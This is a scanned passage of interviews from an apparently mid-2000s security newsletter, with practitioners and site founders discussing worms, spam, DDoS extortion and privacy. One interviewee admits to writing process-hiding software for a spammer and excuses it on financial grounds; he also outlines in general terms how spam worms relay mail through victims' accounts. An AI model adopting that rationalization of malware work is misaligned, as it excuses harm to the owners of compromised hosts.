changes in the threat environment. 


Awareness 

is still an issue in the banking industry where there is a federal 

examiner coming in once a year to tell management what they need to do. 
The reason is because examiners have only been focused on information 
security since 2001 (when the agencies started to enforce GLBA) and they 
are still learning the ins and outs. It’s improving, though, as 

examiners are visibly becoming savvier with time and communicating more 
to the banks. 


Dramatic change in other industries is a bit more 

elusive as they have no such oversight as the banking industry does. 
Still, the Sarbanes-Oxley Act looks to drive better information security 
because a deficient security plan violates the due care requirements of 
the Act. As the act imposes criminal penalties for faulty compliance, 
there will be a lot more pressure once its tenets go into effect this 

fall. 


Astalavista : Malicious software has 

always been trying to get hold of sensitive financial information, how 
significant do you think is the threat from worms like the Bizex one in 
future? 
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Rich : It is a significant problem as it 

goes back to the trust issue. All banks are adopting online banking, 

yet you have malicious code trying to take snapshots of your information 
as well as anyone else’s who are in your address book. 


The FDIC 

recently posted a mandate that banks must have a written patch 
management program consisting of several steps. The reason the agency 
did this is because they realized that poorly patched systems posed a 
severe threat and most financial institutions were doing an insufficient 
job with regards to patch activities. Right now, the great majority of 
banks are 


highly susceptible to these worms, as are their average 

customers who rarely patch their home systems. Of course, even a great 
patch management program only goes so far, especially with zero day 
exploits. 


Astalavista : Despite the latest 

technology improvements and the security measures put in place by 
companies, a major part of the Internet users are still afraid to use 

their credit card online, who should be blamed and most importantly, 
what do you think should be done to increase the number of online 
customers who want to purchase a good or services but feel secure while 
doing it? 


Rich : Consumers are afraid for good 

reasons. How many prime trafficked sites have been broken? It is 
embarrassing, especially when it makes the national media. The latest 
technology improvements and security measures are good, but all 
merchants as a whole need to impose better security on their end. Those 
who don’t improve measures will continue to undermine the efforts of 
those who do by perpetuating the insecurity that many patrons feel with 
regards to online shopping. 


Again, it’s a trust issue and there 

are a Significant amount of consumers who don’t trust typing their 
credit card number into their browser. The good news is that as security 
improves throughout online commerce consumer trust will rise. 
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Astalavista 
: What’s your opinion on companies citing California’s security breach 
disclosure law and notifying customers of a recent security breach? 


Rich 

: Most companies can absorb any financial losses arising from a breach. 

It is the damage to their reputation that poses the greatest risk. What 

is more embarrassing than notifying your customers their information 
was compromised? Not only does the customer lose trust in the company, 
but such a disclosure inevitably becomes public and that can hinder the 
ability to draw new customers. 


So why do | think this law is 

good? Because there is a general apathy among many organizations 
regarding their activities to properly protect their systems. Regulation 
has been the greatest motivator to improve security. In this case, 
forced disclosure is far more motivating than any fine. 


Interview with Mr.Yowler, [32]http://www.cyberarmy.net/ 


Astalavista 

: Mr.Yowler, Cyberarmy.com has been online since 1998, and is a well 
known community around the net. But there’re still people unaware about 
it, can you please tell us something more about the main idea behind 
starting the site, and what inspired you the most? 


MrYowler 

: Well, | didn’t actually start the site; that was Pengo’s doing. | 

actually joined when CyberArmy had about 37,000 members, and | worked my 
way up the ranks, first by completing the puzzles, and later by 
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participating in the community as one of its leading members. | was 
first put in charge, back in 2002, and | bought the domain from Pengo, 
and completely took over, in late 2003. 


CyberArmy is a community 

of ‘hackers’ of various skill levels and ethical colors. We focus 

primarily upon creating a peer environment in which ‘hackers’ can share 
information and ideas, and we accomplish that through our Zebulun puzzle 
and ranked forums, which serve to stratify discussion groups be 
comparative technical ability. We tend to focus on ’nOObs’, largely 
because they are the group that has the most difficulty finding peer 
groups to become involved in, because they are the group that most often 
needs the technical and ethical guidance that CyberArmy provides, and 
because they are the group that is most receptive to this guidance. 


| 

suppose that what | find most inspiring about the CyberArmy is its 
tendency to regulate itself. People who are interested in ‘hacking 
hotmail’ tend to gravitate together, and not pester people who are not 
interested in it, and when they don’t, the community rapidly takes 
corrective action on its own. This is a model that | would like to see 
extend to the rest of the Internet; soammers and kiddie-porn dealers 
should be possible to identify and remove from the networks without the 
necessity to monitor *everyone’s* email, through some regulatory or 
enforcement organization that is largely unrepresentative of the users 
that it is chartered to protect. 


| like that CyberArmy gives its 

members a reason to *think* about social ethics, and to decide upon what 
they should be, rather than to simply accept what is established, 

without reasoning. | find that to be a fundamental failing of modern 
society - that we frequently simply accept law, as the determinant of 
social ethics, instead of requiring law to be guided by them. When 

people use *judgement*, rather than rely solely upon law, then people 
are much more likely to treat one another with fairness. Externally 
imposed rules are for people who lack the judgement skills to figure out 
how best to behave, without them. And most rules, today, are externally 
imposed. | believe that when people *think* about social ethics, it 

usually results in a moral fiber that is founded in an honest *belief* 

in the moral behavior that they come up with - and that this makes for 
infinitely better Internet citizens, than rules or laws that are 

supported only by a deterrent fear of reprisals. | think that such 

people usually come up with better behavior than the minimum standards 
that rules and law do, as well. 
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Astalavista : 

Cyberarmy runs a challenge - Zebulun, which happens to be a very popular 
one. How many people have already passed the challenge, and what are 
you trying to achieve with it besides motivating their brain cells? 


MrYowler 

: About 200,000 people have participated in the Zebulun challenge, over 
the years, to one extent or another. Because the challenges are 
changed, over time (to discourage ‘cheating’, and to keep them 
challenging, during changing times), the definition of "passed the 
challenge" is somewhat variable. Approximately 300-400 people have 
completed all of the challenges that were available to them, to obtain 
the highest possible rank that one can reach, by solving the puzzles. 
That has traditionally been "Kernel" (the misspelling is an intentional 
pun) or "General", and it is presently "Kernel". At the moment, the 
Kernel puzzle seems to be too advanced, and will probably have to be 
changed. There are seven puzzles, and our intended target is that there 
should always be about a 2:1 ratio of players, from one rank to the 
next. This guarantees that the puzzles will be challenging to most 
players, without being discouraging. 


Of course, we like 

encouraging people to learn. More importantly, I’m trying to get people 
to *think*. Anyone can become educated about technical systems; this 
only requires time and dedication to the task. And while that is an 
important think to do, it is already heavily stressed in schools, and 
throughout most societies and cultures. Smart people know a lot of 
things. 


But this is not entirely true. Most smart people have 

come to realize that "knowledge is power" - but it is not the knowledge 
that makes them smart. As with static electricity, which is expressed 
only as voltage potential - until it strikes the ground as lightning - 
knowledge is not expressed as power, until someone *thinks*, and applies 
that knowledge to some useful purpose. Socrates was effectively an 
illiterate shoe-salesman (a cobbler), but he is considered a great 
philospher, because he took the little bit that he knew about the world, 
and *thought* about it. Not only that, but he convinced other to think 
about it, as well. Einstein was a mediocre mathematician and generally 
viewed as a quack, until his thinking was expressed in the form of 
nuclear energy. *Thought* is what separates the well-educated from the 
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brilliant - and most successful ‘hackers’ rely much more upon *thought*, 
than upon an exhaustive understanding of the systems that they target. 
Not that having such knowledge isn’t helpful... :) 


lam trying to 

get people to *think* - not only about intrusion tactics, but also 

about defensive measures, motivations, risks, ethics, and about life in 
general. Too much of the world around us is taken for granted, and not 
questioned. Not thought about. | am trying to make the art of 
questioning and *thinking*, into a larger part of people’s lifestyles. 


Astalavista 

: How did the infosec industry evolved based on your observations since 
1998? Is it getting worse? What are the main reasons behind it? Crappy 
software or the end users’ lack of awareness? 


MrYowler 

: In its early years, the infosec industry was largely dominated by the 
mavericks - as is true with most developing industries. A few people 
dominated the profession, with their independence - it gave them the 
freedom to tell the business world how things should be, and to walk 
away, if the business world was unwilling to comply. Today, we see less 
of that, and 


while the industry is still largely dominated by such 
people, the majority of people whose job is to implement system 
security, are much more constrained by resource limitations. 


Essentially, 

there are two groups of people in the defensive side of this industry; 

the policy-makers and the implementors. Policy-makers are usually 
corporate executives, ClSOs, legislators, consultants, or otherwise 
figures of comparative authority, whose job it is to find out what is 
wrong with system security, and to come up with ideas about how to fix 
it. Implementors are usually the ones who are tasked with implementing 
these ideas, and they are usually system or network administrators, 
programmers, security guards, or otherwise people whose influence on 
things such as budget and staff allocation, is insignificant. As a rule, 

the policy-makers make a great deal of money, establishing policies 
that they have very little part in implementing, and often these 

policies have a significant impact upon the work loads and environments 
of implementors. 
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It is all well and good, for example, to decide 

that there will be no more use of instant messenger software in the 
workplace. Stopping it from occurring, however... while remotely 

possible, by employing purely technical measures, it is certainly not 
desireable or inexpensive. Even monitoring for it can require staff 

resources which are rarely allocated for the task, and the effect of 

draconian security measures - or penalties for non-compliance - is 

usually much more damaging to workplace productivity than the instant 
messengers ever were. For some reason, policy-makers have abandoned the 
basic principle of system design; "involve the user" - and 


have 

limited themselves to requiring the support of executive management. 
Security policy is surprisingly cheaper, faster, and easier to achieve 
compliance with, when is also has the support of the rank-and-file 
members of an organization - and not the kind of support that is 
achieved putting a professional gun to their heads, by requiring people 
to sign compliance agreements. Rather, the support that is achieved by 
giving the employees a sense of personal investment in the security of 
the system. User awareness is fairly easy to achieve, although users 
will tend to disclaim it, when caught in a violation or compromise. 
Creating accountability documents, such as security policy compliance 
agreements, may combat these disclaimers; but the most truly effective 
approach is not to just tell the users and demand compliance - but to 
give the users a voice in it, and the desire to Strive for it. In many 
cases, the users have excellent ideas about areas where system security 
falls down - and similarly excellent ideas about how to fix it. 


Policy-makers 

have to bridge the gap between themselves and implementors, or security 
will always be ’that pain-in-the-ass policy’ which people are trying to 

find ways to work around. And instead of the draconian Hand of God, 
which appears only so that it can smite you down; security needs to 
become the supportive freind that you can always pick up the phone and 
talk 


to, when you have a question or a problem. 


That having been said, there is another problem with modern security practices, that is worth 
giving some attention to... 
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Because 

security has traditionally been sold to organizations, as a way to 

prevent losses that result from security compromises, these 
organizations have begun to assign values to these compromises, and 
these values determine the extent to which these organizations will go, 
to prevent them. While perfectly reasonable and sensible from a business 
perspective, these values are determined largely by educated guessing, 
and the value of a compromise can be highly subjective, depending upon 
who is making the assessment. 


Remember - if your credit 

information gets into the hands of someone who uses it to print checks 
with your name on them, you could spend years trying to straighten out 
your credit with the merchants who accept these checks. It can impact 
your mortgage interest rates, or prevent you from getting a mortgage, at 
all - and it can force you to carry cash, in amounts that may 


place 

you in considerable personal danger. The organization which pulls a 
credit report on you, to obtain this information, however, stands very 
little to lose from its compromise, since you are unlikely to ever 
determine, much less be able to prove, that they were the source of the 


compromise. 

So, what motivates them to guarantee that all credit report information 
is properly protected, destroyed and disposed of? What’s to stop them 
from simply throwing it in the garbage? And what happens to it, if they 
go out of business, or are bought out by some other company? To what 
extent do they verify that their employees are trustworthy? 


This* 

is typically where security falls down. Remember; security is the art 

of protecting *yourself* from harm - not necessarily your customers, 
your marketing prospects, or anyone else. As a result, most of the 
effort to secure systems, goes into protecting the interests of the 
people who *operate* those systems - and not necessarily the users of 
them, or the data 


points that they contain information about. In many 

cases, legal disclaimers and transfers of liability replace actual 
protective countermeasures, when it comes to protecting things that 
you* care about - and in still other cases, a lack accountability 
suffices to make an 


organization willing to take a chance with your 
security, out of a commercial interest in doing so. Marketing entities 
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often openly sell your information, or sell the use of your information 
to market things to you, and make no bones about doing so - after all, 
it’s not their loss, if your 


information gets misused - it’s yours. 


This 

is a fundamental problem in information security, and for many of us it 
costs our personal freedom. The government needs access to all of our 
emails, without the requirement to notify us or get a warrant to access 
the information, because we might be drug dealers or child molestors. 
And | worry that some child molestor will gain access to the 
information, through 


the channels that are made available to 

government. Amazon.com stores our credit information, in order to make 
is easier for us to buy books through them, in the future - and | worry 
that all someone needs is the password to my Amazon.com account, to 
start ordering books on my credit card. Every time that | fill out an 
application for employment, | am giving some filing 


clerk access to 

all the information required, to assume my identity. That information is 
worth a great deal, to me - how much is it worth, to them? Enough to 
pay for a locking cabinet, to put it into? Enough to put it into a 

locked office? Enough to alarm the door? Enough the get a guard to 
protect the facility in which it is stored? Enough to arm the guard? 
Enough to adequately shred and destroy the information, when they 
dispose of it? Enough to conduct criminal background investigations on 
anyone that has access to the information? Or do they just get some 
general corporate liability insurance, and figure that it’s an 
unlikely-enough circumstance, 


that even if it happens, and I’m able 
to trace it back to them, and make it stick, in court, that it’s worth 
the risk of a nuisance libility lawsuit? 


At its core, information 

security is failing, for at least these two reasons: 1) for all the 
talk that goes on, very little on the way of actual resources are 
devoted to information security; and, 2) people and organizations 
usually show comparatively little interest in anyone’s security but 
their own. 
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Astalavista : Mr.Yowler, lately we’ve seen an enormous flood of worms in the wild, 


what do you think is the reason? 


MrYowler : Firstly, these worms exploit errors in upper-layer protocols of networks and 


network 

applications. Because network applications are proliferating at an 
ever-increasing rate, the possible ways to exploit them are also 
increasing at this geometric rate - and people who are interested in 
exploiting them, therefore have more things to work with. 


Secondly, 

there is a glut of information technology talent in the United States, 
perhaps thanks, in part to the collapse of the Internet economy - and 
also, in part, thanks to the rush to outsource technology jobs to 
overseas entities. Additionally, third-world countries have been 
developing 


technical talent for some years, now, in an effort to 

become competitive in this rapidly-growing outsourcing market. This has 
created an evironment where technical talent is plentiful and cheap - 
and often disenfranchised. 


In some cases, these worms are written 

by kids, with nothing better to do - and that has always been a 

problem, which has grown in a linear way, as more and more advanced 
technical education has begun to become available to younger and younger 
students. 


In other cases, this is the technical equivalent of 

"going postal", in which a disenfranchised technology worker creates a 
malicious product, either as a form of vengance, of in the hope of 
creating a need for his own technical talents, as a researcher of 
considerable talent, with regard to the worm in question. Surprisingly 
many people who might otherwise never find work in 


the technical or 

security industries, are able to do so, by making a name for themselves 
through criminal activity or other malicious behavior. While 
demonstrating questionable ethics, it also demonstrates technical 
talent, and the noteriety is sometimes more valuable to a company, than 
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the damage that they risk by hiring someone whose ethics are 
questionable. Many people 


are employed or sponsored in the lecture 

circuit, for this reason; they did something that bought them noteriety - 
good or bad - and their employer/s figure that they can benefit from 
the noteriety, without risking a lot of possible damage, by putting 
these people on the lecture circuit. 


In an increasing number of 

cases, these disenfranchised technology workers are actually employed 
for the specific purpose of creating malware, by spyware, adware, and 
spam organizations, as | will cover in the next question. When one is 
forced to choose between one’s ethics and feeding one’s children, ethics 
are generally viewed as a luxury that one can no 


longer afford. I, 

myself, am currently under contract to a spammer, since | am now 
approximately two weeks from homelessness, and better offers have not 
been forthcoming. I’m writing an application which will disguise a 
process which sends out spam, as something benign, in the process 
listing, on what are presumably compromised *nix hosts. The work will 
buy me approximately one more week of living indoors, which is really 
not enough to justify the 


evil of it, but lam in no position to 

refuse work, regardless of the employer. And indeed, if | did not accept 
the contract, and cheaply, then it is quite likely that someone from a 
third-world country would have done so - and probably much more cheaply 
than | did. 


Astalavista : Recently, spammers and spyware creators started using 0-day browser 


bugs, 

in order to disseminate themselves in ways we didn’t consider serious 
several months ago. Did they get smarter and finally realize the 
advantages or a 0-day exploit, compared to those of an outdated and 
poisoned e-mail databse? 


MrYowler : As indicated 

in the previous question, Spam, spyware and adware organizations are 
beginning to leverage the fact that there is now a glut of technical 
talent available on the world market, and some of it can be had, very 
cheaply. These organizations have been taking advantage of technical 
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staff that could not find better work for a long time. As more people 
who 


possess these talents, find themselves unable to sustain a living 
in the professional world; they are increasingly likely to turn to the 
growing professional underground. 


Employment in the security 

industry is no longer premised on talent, ability, education, skill, or 
professional credentials, and there are essentially three markets that 
are increasingly reachable, for the malware professional world. 1) 
Third-world nations with strong technical educational programs are 
simply screaming for more of this sort of comparatively lucrative work 
to do. 2) Young people who lack the age or credentials to get picked up 
professionally, by the more respectable organizations, often crave the 
opportunity to put ‘hacking’ skills, developed in earlier years, to 
professional use. 3) Older technology workers, finding it difficult to 

find work in a market dominated by under-30-year-old people, often have 
large mortgages to pay, and children to put through college, and are 
willing to take whatever work they can find - if not to solve their 
financial problems, then perhaps to tide them over until a better 
solution presents itself. 


It’s not so much that spam, spyware, 

and adware marketers have become smarter, as it is that greater 
technical talent has become available to them. The same people who used 
to develop and use blacklists, and filter soam based upon header 
information for ISPs that have since gone bankrupt or been bought out, 
are now writing worms that mine email client databases, to 


extract 

names and addresses, and then use this, combined with email client 
configuration information, to send spam out from the user’s host that 

the addresses were mined from. They are using the user’s own name and 
email address, to spoof the sender - even using the SMTP server provided 
to the victim, by their ISP, to deliver the mail. This effectively 

permits them to 


relay through servers that are not open relays, and 

distributing the traffic widely enough to stay under the spam-filtering 
radar of the sending ISPs, and to evade the blacklisting employed by the 
recieving ISPs. It also permits them to leverage the victim’s 

relationship to the recipients of the spam, in order to get them to open 
and read it - and sometimes, to get them to open attachments, or 
otherwise infect themselves with the worm that was used to reach them. 
The spammers have not previously been able to hire talent of this grade, 
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very often - now, this talent is often not only available, but often 
desperate for cash, and therefore willing to work cheap. 


It’s a 

bit like an arms race. In the rush to develop enough technical talent to 
defend against this sort of thing, we have developed an over-abundance 
of talent in the area - and that talent is now being hired to work 

against us. This will presumably force people to work even harder at 
developing coutnermeasures, and repeat the cycle. Assuming, of course, 
that the threat is taken seriously enough by the public, to keep the 

arms race going. After all - once everybody has enough nuclear weapons 
to destroy all the life on Earth, then there isn’t much point in 

striving to build more. You just have to learn to deal with the constant 
threat of extinction, and try 


not to take it too seriously - since 
there isn’t really anything to be done about it, any more. We seem to be 
rapidly approaching this mentality, with regard to malware. 


Astalavista 

: What is your opinion on ISPs that upgrade their customers’ Internet 
connections for free, while not providing them with enhanced security 
measures in place? To put it in another way, what do you think is going 
to happen when there’re more and more novice ADSL users around the 
globe, who don’t have a clue about what is actually going on? 


MrYowler : This comes back around to the second point, with regard to the problems of 


information security, today. People have little interest in anyone’s security but their own. 


The 

ISPs *could* block all outgoing traffic on port 25, unless it is 

destined for the ISPs SMTP servers - and then rate-limit delivery of 

email from each user, based upon login (or in the case of 
unauthenticated broadband, by IP address). This is a measure that would 
have effectively 


prevented both the desktop server and open relay 

tactics that | described in my paper, "Bulk Email Transmission Tactics", 
about four years ago, and it would severely constrain the flow of spam 
from zombie hosts in these user networks. The problem is that they don’t 
care. They only care when the spam is *incoming*, and then they can 


130 


point fingers about how uncaring someone else is. The same holds true 
for individual users. 


It is neither difficult nor expensive to 

implement a simple broadband router, to block most incoming traffic 
which would be likely to infect user hardware with malware. It is also 
not difficult or expensive to implement auto-updating virus protection, 
spyware/adware detection/removal, and software patching. It could be 
done even more cheaply, if ISPs were to 


aggregate the costs, for all 

of their users, and buy service contracts for this kind of protection, 

in bulk, for their users, and pass the cost along as part of the 
‘upgraded’ service. Unfortunately, the nominal cost of doing so, would 
have to be borne by users who do not take the threat seriously, and who 
only care about the threat, when it has a noticeable impact on them. 
Since many of the malware packages are designed *not* to have a 
noticeable impact on the user - using them essentially as a reflection, 
relay, or low-rate DDOS platform, or quietly extracting data from their 
systems which will be abused in ways not directly traceable to their 
computer - these users to not perceive the threat to be real, and are 
therefore unwilling to invest - even nominally - in protecting 
themselves from it. ISPs are not willing to absorb these costs, and they 
are not willing to risk becoming uncompetitive, by passing costs on to 
their subscribers; so they pay lip service to questions of security and 
antispam service, and perform only the most minimal tasks, to support 
their marketing claims. 


As with most organizations, the security 

of the organization itself, lies at the focus of their security 

policies. The security of subscribers, other network providers, or other 
Internet users in general, is something that they go to some trouble to 
create the perception that they care about, but when the time comes to 
put their money where their mouths are, it’s just not happening. 


Astalavista : Thanks for your time. 


MrYowler : Any time... :-P 
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Interview with a core founder of Astalavista.com [33]http://www.astalavista.com/ 


Dancho 

: Hi Prozac, Astalavista.com - the underground has been one of the most 
popular and well known hacking/security/cracks related web site in the 
world since 1997. How did it all start? What was the idea behind it? 


Prozac : 

Basically, it was me and a college friend that started Astalavista.com 
during our student years. The name of the site came from the movie 
Terminator 2 from Schwarzenegger’s line " Hasta la vista Baby"! Back in 
those days there weren’t many qualified security related web sites, and 
we spotted a good opportunity to develop something unique, which quickly 
turned into one of the most popular hacking/security sites around the 
globe. In the beginning, it was just our Underground Search List, the 
most comprehensive and up-to-date search list of underground and 
security related web sites, based on what we define as a quality site. 
Then we started providing direct search opportunities and started 
developing the rest of the site. Many people think we did some serious 
brainstorming before starting Astalavista, well, we did, but we hadn’t 
expected it to become such a popular and well known site, which is the 
perfect moment to say thanks to all of you who made us as popular as 
we're today. 


Dancho : Astalavista.com always 

provides up to date, sometimes "underground" documents/programs. The 
Security Directory is growing daily as well, and it has been like this 

for the past several years. How do you manage to keep such an archive 
always online, and up to date? 


Prozac : 

Astalavista’s team members are aware of what’s "hot" and what’s 
interesting for our visitors, just because we pay an enormous attention 
to their requests for security knowledge, and try to maintain a certain 
standard, only quality files. While we add files every day, a large 
number of those are submitted by our visitors themselves, who find their 
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programs and papers highly valued at our site, as we give them the 
opportunity to see how many people have downloaded their stuff. 


Dancho : Astalavista occupies people’s minds as the underground search engine. But what is 
Astalavista.com all about? 


Prozac 

: The majority of people still think Astalavista.com is a Crack web 

site, which is NOT true at all. Astalavista.com is about spreading 
secutity knowledge, about providing professionals with what they’re 
looking for, about educating the average Internet user on various 
security issues; basically we try to create a very well segmented portal 
where everyone will be able to find his/her place. We realize the fact 
that we’re visited by novice, advanced and highly advanced users, even 
government bodies; that’s why we try to satisfy everyone with the files 
and resources we have and help everyone find precious information at 
astalavista.com. Although we sometimes list public files, the exposure 
they get through our site is always impressing for the author, while on 
the other hand, some of the files that are listed at Astalavista.com 
sometimes appear for the first time at our site. We try not to emphasize 
on the number of files, but on their quality and uniqueness. 


Dancho 
: Everyone knows Astalavista, and sooner or later everyone visits the 
site. How did the image of Asta become so well-known around the world? 


Prozac 

: Indeed, we are getting more and more visitors every month, even from 
countries we didn’t expect. What we think is important is the quality of 
the site, the lack of porn, the pure knowledge provided in the most 
professional and useful way, the free nature of the site, created "for 

the people", instead of getting it as commercial as possible. Yes, we 
work with a large number of advertisers, however, we believe to have 
come to a model where everyone's happy, advertisers for getting what 
they’re paying for, and users for not being attacked by adware or 
spyware or a large number of banners. 


Dancho : A question everyone’s asking all the time - is Astalavista.com illegal? 
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Prozac 

: No! And this is an endless debate which can be compared to the Full 
Disclosure one. We live in the 21st century, a single file can be made 
public in a matter of seconds, then it’s up to the whole world to decide 
what to do with the information inside. We’re often blamed because 
we’re too popular and the files get too much exposure. We’re often 
blamed for serving these files to script-kiddies etc. Following these 
thoughts, | think we might also ask, is Google illegal, or is Google’s 
cache illegal?! Yes, we might publish certain files, but we’ll never 
publish "The Complete Novice Users on HOWTO ShutDown the Internet using 
20 lines VB code". And no, we don’t host any cracks or warez files, and 
will never do. 


Dancho : Such a popular secutity 

site should establish a level of social responsibility - given the fact 
how popular it is among the world, are you aware of this fact, or 
basically it’s just your mission that guides you? 


Prozac 

: We're aware of this fact, and we keep it in mind when appoving or 
adding new content to the site. We also realize that we still get a 

large number of "first time visitors", some of them highly unaware of 
what the security world is all about; and we try to educate them as 

well. And no, we’re not tempted by "advertising agencies" eager to place 
adware/spyware at the site, or 


users submitting backdoored files, and we have a strict policy on how to deal with those - 
"you're not welcome at the site"! 


Dancho 

: We saw a completely new and "too professional to be true" 
Astalavista.com since the beginning of 2004 - what made you renovate the 
whole site, and its mission to a certain extend? 


Prozac 

: It was time to change our mission in order to keep ourselves alive, 

and most importantly, increase the number and quality of our visitors, 
and we did so by finding several more people joining the Astalavista.com 
team, closely working together to improve and popularize the site. We 
no longer want to be defined as script kiddies paradise, but as a 
respected security portal with its own viewpoint in the security world. 
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Dancho : What should we expect from Astalavista.com in the near future? 


Prozac 

: To put it in two words - changes and improvements. We seek quality 
and innovation, and have in mind that these developed by us, have an 
impact on a large number of people - you, our visitors. Namely because 
of you we’re devoted to continue to develop the site, and increase the 
number of services offered for free, while on the other hand provide 
those having some 


sort of purchasing power and trusting us with more quality services and products. 


Dancho : Thanks for the chat! 


Prozac : You’re more than welcome :) 


Interview with Candid Wuest, [34]http://www.trojan.ch/ 


Astalavista : Candid, would you, please, introduce yourself to our readers and tell us more 
about your background in the security industry? 


Candid 

: Well, my name is Candid and | have been working in the computer 
security field for several years now, performing different duties for 

different companies. For example, IBM Security Research and Symantec to 
name the most known ones. | got a master degree in computer science but, 
in my opinion, in this business curiosity is the main thing that 

matters. 
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Astalavista : What do you think has had 

a major impact on the popularity of malware in recent years? Is it the 
easiness of coding a worm/trojan or the fact that the authors don’t get 
caught? 


Candid : Why do people code worms? Because they can? 


The 

first point | would like to mention here is the growth of the Internet 

as a whole in the last years. More people getting a system and more 
people getting broadband access means more people are exposed to the 
risks. You may say the fish tank has grown over the years; therefore it 

is clear that there is now also more space for sharks in it. 


| 

think the few people which where caught have scared some and stopped 
them from doing the same, but the media hype they have caused has for 
sure attracted new ones to get started with the whole idea. So this 

might balance out even and these were mostly smaller fishes, which 
didn’t take enough precautions. 


Another point to mention is that 

it is really easy to download a source code and create your own malware 
and it is getting easier every day. There are many bulletin boards out 
there with fast growing communities helping each other in developing new 
methods for malware or simply sharing their newest creations. 


When 

recalling the last hundreds of worms we saw in the wild for the last 
time, most of them were similar and much alike. Nearly no direct 
destructive payload and not much innovation in regards to the used 
methods. Just a mass mailer here or an IRC bot there. 


That’s why | 

think the motivation is a mixture of the easiness of doing so and the 
mental kick suggested from the media, which pushes the bad underground 
hacker image. (Even though the media uses the term hacker seldom 
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correctly in its original meaning.) This seems to motivate many to code 
malware: just because they can. 


In the future money might become a new motivation for malware writers, when industrial 
parties get involved in it. 


Astalavista 

: Where’s the gap between worms in the wild and the large number of 
infected computers? Who has more responsiblity, the system 
administrators capable of stopping the threat at the server level, or 
the large number of people who don’t know how to protect themsvels 
properly? 


Candid : As we all should know 100 % 

security will never be reached, regardless of what the sysadmin and the 
end user do. A good example for this is the recent issue with the JPEG 
and TIFF malware, which sneaked through many filters. 


In my 

opinion the sysadmins have the easier task, as they can enforce their 
restriction; often it’s just a question of having the time to do it 

properly. Don’t get me wrong here. | Know the whole patching issue may 
be quite a pain sometimes. Of course, they have all the users and the 


management complaining if the restrictions are (too) tight but that’s how it works, right :- ) 


Therefore 

| think often it is the end user who has not enough protection or 

simply does not care enough about it. Many users still think that no one 
will aim at them, as they are not an interesting target, but DDoS 
attacks for example do exactly target such a user. Of course, many end 
users don’t have the possibilities of a sysadmin. In general, it comes 
down to an AntiVirus and a personal firewall application, which still 
leaves enough space for intruders to slip through. 


So, as always, it should be a combination of an ISP, a sysadmin and an end user working 
together to protect themselves. 
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Astalavista 

: We've recently seen a DDoS mafia, something that is happening even 
now. What is the most appropriate solution to fight these? Do you think 
this concept is going to evolve in time? 


Candid : 

DDoS attacks are quite hard to counter if they are performed ina 
clever way. | have seen concepts for which | haven’t seen a working 
solution yet. Some can be countered by load balancing and traffic 
shaping or by simply changing the IP address if it was hard coded. More 
promising would be if you could prevent the DDoS nets from being 
created, but this goes back to question number three. 


Astalavista : Have you seen malware used for e-spionage, and do you think it’s the next 
trend in the field? 


Candid 

: This is nothing new; malware has been used for industrial e-spionage 
for years. Usually, it just isn’t that well known as those attacks might 
never get noticed or admitted in public. | have seen plenty of such 
attacks over the last years. This for sure will increase in time as more 
business relevant data gets stored in vulnerable environments. In some 
sort you could even call phishing an art of espionage. But | think the 
next big increase will be in the adware & spyware filed where 

malware authors will start getting hired to write those applications as 


it already happens today. Or are you sure that your favourite application is not sending an 
encoded DNS request back somewhere? 


Interview with Anthony Aykut,Frame4 Security Systems [35]http://www.frame4.com/ 


Astalavista 

: Anthony, would you please tell us something more about your 
experience in the InfoSec industry, and what is Frame4 Security Systems 
all about? 


138 


Anthony : Sure. | guess | am what you 

would primarily call a "security enthusiast", with what | came to see 
as "a keen sense of security business enthusiasm". Actively following 
the Trojan/Virus community since my teens in the late-1980’s, | have 
been working in the IT industry since the early 90’s, though up until 
2002 | have never felt the need to follow the IT security path. Let’s 
just say that a certain chain of events made me "fall" into it :-)) ... 
and that is when | decided to start Frame4 Security Systems. 


Frame4 

Security Systems is a small IT-Security company based in the 
Netherlands. We offer the usual "out-of-the-box" professional security 
services (security audits, pen-testing, etc.), but we especially pride 
ourselves on our outstanding security awareness programs (seminars and 


courses), 

exceptional service, and our upcoming "ProjectX Security 
Knowledgebase". | really feel that we are on an unique playing-field 
with Frame4; whereas big (and often expensive) consultancies are 
primarily focused on big companies/contracts, bottom line figures and 
dead-lines - often the Security Awareness on a personal (employee) level 
gets often overlooked. This creates a well-known security gap that gets 
exploited more and more often, rendering the million-dollar security 
solution back in the server-room absolutely useless. | have personally 
seen good examples of this within big companies - and it is therefore 
we let the big boys do what they are good at by providing solid, proven 
solutions, whereas we have the unique opportunity of "fighting the 
disease from inside-out". 


Astalavista : "Internet privacy", do these words still exist in your opinion? 


Anthony 

: To a large extent (and unfortunately), no. But | guess this was to be 
expected with millions of people pumping their personal data into 
online databases and keeping information on their PCs. It is an open 
field, with little or no control or control structure. Let’s face it, 
(personal) information and data is big business, and people will do 
absolutely anything from hacking databases to infecting people with 
spyware/trojans to extract that information. And in some cases, 
custodians of personal information have just made it way too easy for 
other (unauthorised) people to gain access to private data. | guess 
that’s when the finger-pointing started :-) 
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But on a more serious 

note, | have friends who are so paranoid that they only surf the net 

behind a wall of proxies and anonymizers, under false/assumed names and 
identities. Me, | am just careful; | think when people have a basic 

online awareness level, and know what to look out for, it is no more a 
threat to your information than, say, putting your garbage outside and 
someone going through it (a.k.a. dumpster diving). 


Astalavista 

: We have recently seen a large number of DDoS extortion schemes, 
whereas certain companies comply behind the curtains, should we consider 
every E-business site that goes down a victim of extortion schemes? 

What do you think a company should do in a situation like this? 


Anthony 

: | personally think that "head-in-the-sand" ostrich attitude is 
completely wrong; pay once to one extortionist, and a dozen others will 
line up to grab that easy cash. | don’t think you should comply and give 
in to any of these demands (I prefer to call them threats) but come out 
with it in the open and track down the perpetrators if possible. 
Openness, like some companies have chosen, may possibly dent your 
corporate identity on a temporary basis, but also takes away the power 
of the extortionist. We have seen that this approach is the lesser of 
two evils in general, especially true if your business does not depend 
on a internet presence per se. 


Astalavista : In 

today’s world of "yet another worm in the wild", what do you think are 
the main consequences for this cycle, and what do you think should be 
done in order to prevent it? 


Anthony : Well, | 

am pretty clear on that. As long as publicly/privately available 

source-code floats around the web, not much can be done - unless the AV 
vendors come up with better technologies. It really is up to them to 

come up with better and improved techniques to protect our systems - 
more and more the current AV technology is showing that it is getting 
out-dated by being circumvented in many ways. | am more than aware that 
it is difficult to "protect against the unknown", but | just know there 
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should be more. Maybe AV vendors should float a bit more within the 
"community" to gain awareness 


-) 


To be honest, with the 

advent of other malware, such as Trojans, Sniffers, Keyloggers and 
Spyware to name a few and many interesting technologies such as 
Firewall-Bypassing, etc. it is getting more and more obvious that we 
need an "All Comprehensive Malware Solution" than just a pattern based 
AV system. It just ain’t cutting it anymore. Until then, keep up your 
